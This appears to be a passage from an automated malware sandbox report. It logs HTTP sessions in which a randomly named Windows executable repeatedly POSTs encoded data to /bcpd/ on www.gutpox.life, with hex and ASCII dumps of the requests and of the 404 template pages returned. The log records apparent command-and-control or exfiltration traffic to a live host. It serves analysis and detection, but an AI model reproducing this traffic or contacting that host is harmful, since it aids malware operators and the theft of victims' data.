                                                                                                                                            Data Ascii: 5vc=52/deKBDcas0+tcg7AAuz0Tj1kEYFAEudDKujbM1llQsAE9dsXar3xBy1+zP+qEPMo54jGMqWBtWRnAEAukNji6Y1aXbcjU9iDwJlZ4R6kA5g/TKvysRHCRouvKmD+JozOtX6CToCFR6rK5Fmag8ca70BajFeRMG5z8LodeBwj8Nc1W/DtFFzAgWH0Pnk3EYvSJzWR9oB6zz
                                                                                                                                            Oct 10, 2024 12:52:48.237704039 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:48 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            Content-Length: 32106
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                                            Oct 10, 2024 12:52:48.237735987 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                                                                                                                            Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                                                                                                                            Oct 10, 2024 12:52:48.237760067 CEST448INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                                                                                                                            Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                                                                                                                            Oct 10, 2024 12:52:48.237842083 CEST1236INData Raw: 74 68 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 66 61 62 6c 65 73 2d 74 6f 70 2d 68 65 61 64 65 72 2d 73 69 67 6e 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: th-background-color fables-top-header-signin"> <div class="container"> <div class="row" id="top-row"> <div class="col-12 col-sm-2 col-lg-5"> <div class="dropdown"> <button class="btn bt
                                                                                                                                            Oct 10, 2024 12:52:48.237864017 CEST1236INData Raw: 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 70 68 6f 6e 65 22 3e 3c 2f 73 70 61
                                                                                                                                            Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconphone"></span> Phone : (888) 6000 6000 - (888) 6000 6000</p> </div> <div class="col-12 col-sm-5 col-lg-3 text-right"> <p class="fabl
                                                                                                                                            Oct 10, 2024 12:52:48.237886906 CEST1236INData Raw: 6f 6e 20 74 65 78 74 2d 77 68 69 74 65 20 66 6f 6e 74 2d 31 36 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: on text-white font-16"></span> </button> <div class="collapse navbar-collapse" id="fablesNavDropdown"> <ul class="navbar-nav mx-auto fables-nav">
                                                                                                                                            Oct 10, 2024 12:52:48.237907887 CEST1236INData Raw: 70 64 6f 77 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65
                                                                                                                                            Data Ascii: pdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav2" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> Features
                                                                                                                                            Oct 10, 2024 12:52:48.237931013 CEST1236INData Raw: 6c 22 3e 48 65 61 64 65 72 20 4d 65 67 61 20 6d 65 6e 75 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: l">Header Mega menu</a></li> </ul> </li> <li><a class="dropdown-item dropdown-toggl
                                                                                                                                            Oct 10, 2024 12:52:48.237951994 CEST1236INData Raw: 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20
                                                                                                                                            Data Ascii: arent</a></li> <li><a class="dropdown-item" href="header3-light.html">Header 3 Light</a></li> <li><a class="dropdown-item"
                                                                                                                                            Oct 10, 2024 12:52:48.237974882 CEST1236INData Raw: 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 35 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: tem dropdown-toggle" href="#">Header 5</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header5-transparent.ht
                                                                                                                                            Oct 10, 2024 12:52:48.242927074 CEST1236INData Raw: 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 66 6f 6f 74 65 72 31 2d 62 67 2d 69 6d 67 2e 68 74 6d 6c 22 3e 46 6f 6f 74 65 72 20 31 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20
                                                                                                                                            Data Ascii: ass="dropdown-item" href="footer1-bg-img.html">Footer 1 Transparent</a></li> <li><a class="dropdown-item" href="Footer1-light.html">Footer 1 Light</a></li>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            18192.168.2.66140867.223.117.189805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:50.182602882 CEST788OUTPOST /bcpd/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.gutpox.life
                                                                                                                                            Origin: http://www.gutpox.life
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 232
                                                                                                                                            Referer: http://www.gutpox.life/bcpd/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 35 32 2f 64 65 4b 42 44 63 61 73 30 78 74 4d 67 34 6e 55 75 31 55 54 69 72 55 45 59 4f 67 45 71 64 44 57 75 6a 66 38 6c 6c 33 30 73 42 6c 4e 64 74 57 61 72 32 78 42 79 2b 65 79 46 77 4b 45 45 4d 6f 45 46 6a 43 4d 71 57 42 35 57 52 69 38 45 41 5a 51 4f 78 69 36 61 35 36 58 5a 42 7a 55 39 69 44 77 4a 6c 5a 73 2f 36 6c 6f 35 68 50 6a 4b 74 51 45 53 59 79 52 6e 2b 2f 4b 6d 4a 75 49 41 7a 4f 74 6c 36 48 4c 4f 43 44 64 36 72 50 39 46 33 72 67 6a 57 61 37 36 46 61 69 50 53 52 4a 6b 34 43 34 4b 6a 2b 79 66 74 43 38 36 64 44 58 6c 66 65 46 6d 68 51 41 55 48 32 58 56 6b 58 45 79 74 53 78 7a 45 47 78 50 4f 4f 57 51 75 52 5a 38 34 78 67 6b 53 76 59 59 42 70 43 48 48 71 56 6b 61 67 3d 3d
                                                                                                                                            Data Ascii: 5vc=52/deKBDcas0xtMg4nUu1UTirUEYOgEqdDWujf8ll30sBlNdtWar2xBy+eyFwKEEMoEFjCMqWB5WRi8EAZQOxi6a56XZBzU9iDwJlZs/6lo5hPjKtQESYyRn+/KmJuIAzOtl6HLOCDd6rP9F3rgjWa76FaiPSRJk4C4Kj+yftC86dDXlfeFmhQAUH2XVkXEytSxzEGxPOOWQuRZ84xgkSvYYBpCHHqVkag==
                                                                                                                                            Oct 10, 2024 12:52:50.784450054 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:50 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            Content-Length: 32106
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                                            Oct 10, 2024 12:52:50.784501076 CEST224INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                                                                                                                            Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ...
                                                                                                                                            Oct 10, 2024 12:52:50.784538984 CEST1236INData Raw: 20 4f 57 4c 20 43 41 52 4f 55 53 45 4c 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22
                                                                                                                                            Data Ascii: OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="
                                                                                                                                            Oct 10, 2024 12:52:50.784573078 CEST224INData Raw: 69 64 3d 22 6a 75 2d 6c 6f 61 64 69 6e 67 2d 73 63 72 65 65 6e 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20
                                                                                                                                            Data Ascii: id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-for
                                                                                                                                            Oct 10, 2024 12:52:50.784601927 CEST1236INData Raw: 74 68 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 66 61 62 6c 65 73 2d 74 6f 70 2d 68 65 61 64 65 72 2d 73 69 67 6e 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: th-background-color fables-top-header-signin"> <div class="container"> <div class="row" id="top-row"> <div class="col-12 col-sm-2 col-lg-5"> <div class="dropdown"> <button class="btn bt
                                                                                                                                            Oct 10, 2024 12:52:50.784640074 CEST1236INData Raw: 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 70 68 6f 6e 65 22 3e 3c 2f 73 70 61
                                                                                                                                            Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconphone"></span> Phone : (888) 6000 6000 - (888) 6000 6000</p> </div> <div class="col-12 col-sm-5 col-lg-3 text-right"> <p class="fabl
                                                                                                                                            Oct 10, 2024 12:52:50.784674883 CEST448INData Raw: 6f 6e 20 74 65 78 74 2d 77 68 69 74 65 20 66 6f 6e 74 2d 31 36 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: on text-white font-16"></span> </button> <div class="collapse navbar-collapse" id="fablesNavDropdown"> <ul class="navbar-nav mx-auto fables-nav">
                                                                                                                                            Oct 10, 2024 12:52:50.784707069 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                                                                                                                            Oct 10, 2024 12:52:50.784739971 CEST224INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                                                                                                                            Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                                                                                                                            Oct 10, 2024 12:52:50.784768105 CEST1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22
                                                                                                                                            Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li>
                                                                                                                                            Oct 10, 2024 12:52:50.789858103 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 32 2d 64 61 72 6b 2e 68 74 6d 6c 22
                                                                                                                                            Data Ascii: <li><a class="dropdown-item" href="header2-dark.html">Header 2 Dark</a></li> </ul> </li>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            19192.168.2.66140967.223.117.189805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:52:52.729840040 CEST1801OUTPOST /bcpd/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.gutpox.life
                                                                                                                                            Origin: http://www.gutpox.life
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 1244
                                                                                                                                            Referer: http://www.gutpox.life/bcpd/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 35 32 2f 64 65 4b 42 44 63 61 73 30 78 74 4d 67 34 6e 55 75 31 55 54 69 72 55 45 59 4f 67 45 71 64 44 57 75 6a 66 38 6c 6c 33 38 73 42 58 46 64 73 31 79 72 6b 42 42 79 7a 2b 79 49 77 4b 45 5a 4d 6f 73 42 6a 43 49 55 57 44 42 57 51 41 45 45 58 38 38 4f 37 69 36 61 78 61 58 63 63 6a 55 6f 69 44 41 46 6c 5a 38 2f 36 6c 6f 35 68 4a 48 4b 70 43 73 53 44 79 52 6f 75 76 4c 6e 44 2b 49 37 7a 4b 42 31 36 48 2b 31 43 7a 39 36 72 76 4e 46 31 35 34 6a 65 61 37 76 4a 36 6a 61 53 51 31 53 34 43 31 37 6a 2f 47 6c 74 41 67 36 66 33 53 74 4b 71 46 4e 31 53 41 53 65 57 72 6b 68 58 46 44 30 68 78 6f 48 67 68 46 47 61 43 4a 70 52 42 52 30 43 74 64 66 75 67 46 47 70 72 58 4f 36 63 75 5a 54 6c 66 62 45 42 4e 4c 59 39 67 6c 4d 69 35 6a 73 58 79 79 4e 78 2f 61 71 56 38 4e 4b 43 4a 36 46 4c 42 6a 4c 6c 51 75 6f 78 4c 4b 36 52 45 67 36 43 39 73 73 4e 36 54 46 58 4a 42 6b 4c 72 4d 32 46 37 58 6f 41 61 6d 71 44 50 58 78 31 4d 4b 4b 71 48 2b 56 50 41 65 35 77 58 4b 36 78 31 4f 49 52 67 58 6e 37 42 42 74 5a 35 46 6c [TRUNCATED]
                                                                                                                                            Data Ascii: 5vc=52/deKBDcas0xtMg4nUu1UTirUEYOgEqdDWujf8ll38sBXFds1yrkBByz+yIwKEZMosBjCIUWDBWQAEEX88O7i6axaXccjUoiDAFlZ8/6lo5hJHKpCsSDyRouvLnD+I7zKB16H+1Cz96rvNF154jea7vJ6jaSQ1S4C17j/GltAg6f3StKqFN1SASeWrkhXFD0hxoHghFGaCJpRBR0CtdfugFGprXO6cuZTlfbEBNLY9glMi5jsXyyNx/aqV8NKCJ6FLBjLlQuoxLK6REg6C9ssN6TFXJBkLrM2F7XoAamqDPXx1MKKqH+VPAe5wXK6x1OIRgXn7BBtZ5FljUi61dM/jCiTQ1cSJa09v71mlEPdmd6oq4yIk/zNSUCKSb6UZuEYJuHKWurhfKA5mLdsJ/nrpB0BUHNqA1Gs0NS0pF8zcGlliBzNuJmMT5p1Ds3yn23s3+dj2nq4mST5AWHRVZ90uSiG6l4ANaYsouLZXomkYC/2nbIZHw+C1ajIpHs/6bURsTrH58Dplg9URzboMPpcw8pSeKR4k8if871xoR/n8Rz7UhS/DgmMLk8rWNKu2szhM2bwJ7kombLfA/6l6NOzL3xrSePPcdF5szOekOmfI77gRWwk09q/R54izLVEO3uxUrnqPOrPMZ1Sdelk+4YlWiMskTDI83XYbrs4UYWmfO3XZ/UTD01I4MbGohCBIf7ztnUJ/18elNup+4TLgp77wPjP8Vbkfu6e/7wA04QXsywd82Z6zHcURxZ+jS0PxJ4WdFRfZgmUn5YwMlUiqhX8fD010DZGC9sl+KRm5ih/zZwtL16xoYx81mO5mCkVovQLNnugqnaYezOApMHCUXJ8CrsENNwW+1PfXSSXlqhzq36MPtWkTE33RbLnmXweHULq+K/cDUWMqYqBLSg0rr3GHNzfSugvsAfY8bBF/qk3OhXBKyxR8D52+3d8VqY57Ncwr44+C5v/dTDENmhvRzXcCvogtdErvdWF6K7LEQjSLMeYq7 [TRUNCATED]
                                                                                                                                            Oct 10, 2024 12:52:53.309390068 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                            Date: Thu, 10 Oct 2024 10:52:53 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            Content-Length: 32106
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                                            Oct 10, 2024 12:52:53.309426069 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
